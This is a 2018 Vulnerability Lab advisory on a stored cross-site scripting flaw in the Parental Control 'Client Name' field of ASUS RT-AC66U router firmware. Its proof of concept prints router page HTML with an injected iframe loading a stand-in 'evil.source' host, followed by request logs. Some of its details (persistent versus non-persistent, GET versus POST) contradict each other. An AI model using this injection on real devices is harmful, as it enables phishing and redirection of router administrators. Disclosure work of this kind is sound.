Document Title:
===============
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1993
Release Date:
=============
2018-06-27
Vulnerability Laboratory ID (VL-ID):
====================================
1993
Common Vulnerability Scoring System:
====================================
3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500a! - 1.000a!
Product & Service Introduction:
===============================
802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports
several operation modes to meet
different requirements. Please select the mode that match your
situation. Wireless router mode (Default),
Access Point(AP) mode or Media bridge. In wireless router/ IP sharing
mode, RT-AC66U connects to the
Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the
wireless network to LAN clients or
devices. In this mode, NAT, firewall, and DHCP server are enabled by
default. UPnP and Dynamic DNS
are supported for SOHO and home users. Select this mode if you are a
first-time user or you are not
currently using any wired/wireless routers. The ASUS RT-AC66U is a 5th
gen dual-band Wi-Fi router,
and the launch platform for the new ASUS AiCloud service. Its speed
reaches 1.75Gbps, utilizing the
Broadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The
5GHz band supports up to 1.3Gbps,
exceeding current Gigabit wired transmission and 3X faster than 802.11n.
The RT-AC66U offers smooth
lag-resistant multitasking and super-fast streaming, while ASUS AiRadar
intelligently strengthens wireless
connections via powerful amplification, offering future-proof optimized
performance.
(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered mutliple
cross site scripting vulnerabilities
in the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.
Vulnerability Disclosure Timeline:
==================================
2018-06-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ASUS
Product: WRT - Wireless Router (UI) 3.0.0.4.372_67
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A cross site scripting vulnerability has been discovered in the ASUS
Wireless Router RT Firmware v3.0.0.4.372_67.
The cross site scripting web vulnerability allows remote attackers to
inject own malicious script codes on the
application-side of the vulnerable function or service module.
The cross site scripting vulnerability is located in the `Client Name`
input field of the `Partental Control` modules.
The input field for the client name is not secure parsed. Thus allows an
attacker to manipulate the client list on index
of the module. The request method to inject is POST and the attack
vector is located on the application-side. Due to no
reachable cookies in the panel ui, low privileged user accounts are only
able to redirect or inject malware to the
client-side for an execute. First the context is saved client-side and
after using apply function the context is
saved permanently to the image db.
The security risk of the client-side cross site scripting web
vulnerability is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.0. Exploitation of the
client-side web vulnerability requires
a privileged web-application user account and low user interaction.
Successful exploitation of the vulnerability
results in non-persistent phishing, session hijacking, non-persistent
external redirect to malicious sources and
client-side manipulation of affected or connected web module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Parental Control
Vulnerable Parameter(s):
[+] Client Name
Proof of Concept (PoC):
=======================
The cross site vulnerability can be exploited by remote attackers with
privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploitation
<tbody><tr><th title="Select all" width="5%" height="30px"><input
id="selAll" onclick="selectAll(this, 0);"
value="" type="checkbox"></th><th width="40%">Clients Name</th><th
width="25%">Clients MAC Address</th><th width="10%">
Time Management</th><th width="10%">Add / Delete</th></tr><tr><td
style="border-bottom:2px solid #000;"
title="Enable/Disable"><input id="newrule_Enable" checked=""
type="checkbox"></td><td style="border-bottom:2px solid #000;">
<input maxlength="32" style="margin-left:10px;float:left;width:255px;"
class="input_20_table" name="PC_devicename"
onkeypress="" onclick="hideClients_Block();"
onblur="if(!over_var){hideClients_Block();}" type="text"><img
id="pull_arrow"
src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select
the device name of DHCP clients."
onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;"><div
id="ClientList_Block_PC" class="ClientList_Block_PC">
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"
onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');">
<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div
onmouseover="over_var=1;" onmouseout="over_var=0;"
onclick="setClientIP('JIEMING-MACBOOK',
'98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK)
</div></a>
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"
onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');">
<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div
onmouseover="over_var=1;" onmouseout="over_var=0;"
onclick="setClientIP('A8:26:D9:31:2B:49',
'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong> </div></a>
<!--[if lte IE 6.5]><iframe
class="hackiframe2"></iframe><![endif]--></div></td><td
style="border-bottom:2px solid #000;">
<input maxlength="17" class="input_macaddr_table" name="PC_mac"
onkeypress="return is_hwaddr(this,event)"
type="text"></td><td style="border-bottom:2px solid #000;">--</td><td
style="border-bottom:2px solid #000;">
<input class="url_btn" onclick="addRow_main(16)" value=""
type="button"></td></tr><tr id="row0"><td title="1">
<input onclick="genEnableArray_main(0,this);" checked=""
type="checkbox"></td><td title=""></td>
<td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input
class="service_btn" onclick="gen_lantowanTable(0);"
value="" type="button"></td><td><input class="remove_btn"
onclick="deleteRow_main(this);" value="" type="button"></td></tr>
<tr id="row1"><td title="undefined"><input
onclick="genEnableArray_main(1,this);" type="checkbox"></td>
<td title="" <iframe="" src="evil.source"">"<iframe
src="evil.source</td"><td title="undefined">undefined</td>
<td><input class="service_btn" type="button"
onclick="gen_lantowanTable(1);" value=""/></td><td><input
class="remove_btn" type="button" onclick="deleteRow_main(this);"
value=""/></td><tr id="row2"><td title="undefined">
<input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td
title=""></td><td title="undefined">undefined</td>
<td><input class="service_btn" type="button"
onclick="gen_lantowanTable(2);" value=""/></td><td>
<input class="remove_btn" type="button" onclick="deleteRow_main(this);"
value=""/>
</td></tr></table></iframe></td></tr></tbody>
--- PoC Session Logs [GET] ---
Status: 304[Not Modified]
GET http://event.localhost/nw/_ui/en/ParentalControl.html
Mime Type[text/html]
Request Header:
Host[event.localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]
If-None-Match["31793159796dce1:0"]
Cache-Control[max-age=0]
Response Header:
Content-Type[text/html]
Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]
Etag["31793159796dce1:0"]
Connection[keep-alive]
-
Status: 200[OK]
GET http://event.localhost/nw/_ui/en/evil.source%3C/td
Mime Type[text/html]
Request Header:
Host[event.localhost]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Content-Type[text/html]
Server[Microsoft-IIS/7.5]
X-Powered-By[ASP.NET]
Content-Length[1245]
Connection[keep-alive]
Reference(s):
http://event.localhost/
http://event.localhost/nw/
http://event.localhost/nw/_ui/
Solution - Fix & Patch:
=======================
The issue has been reported in 2016 Q4 (2016-11-09) and was finally
resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public
disclosure process took about 10 month.
Security Risk:
==============
The security risk of the persistent cross site scripting web
vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).
Credits & Authors:
==================
Lawrence Amer (Vulnerability Lab Core Research Team)
[zeroattck@gmail.com] -
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution
Security GmbH]aC/
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com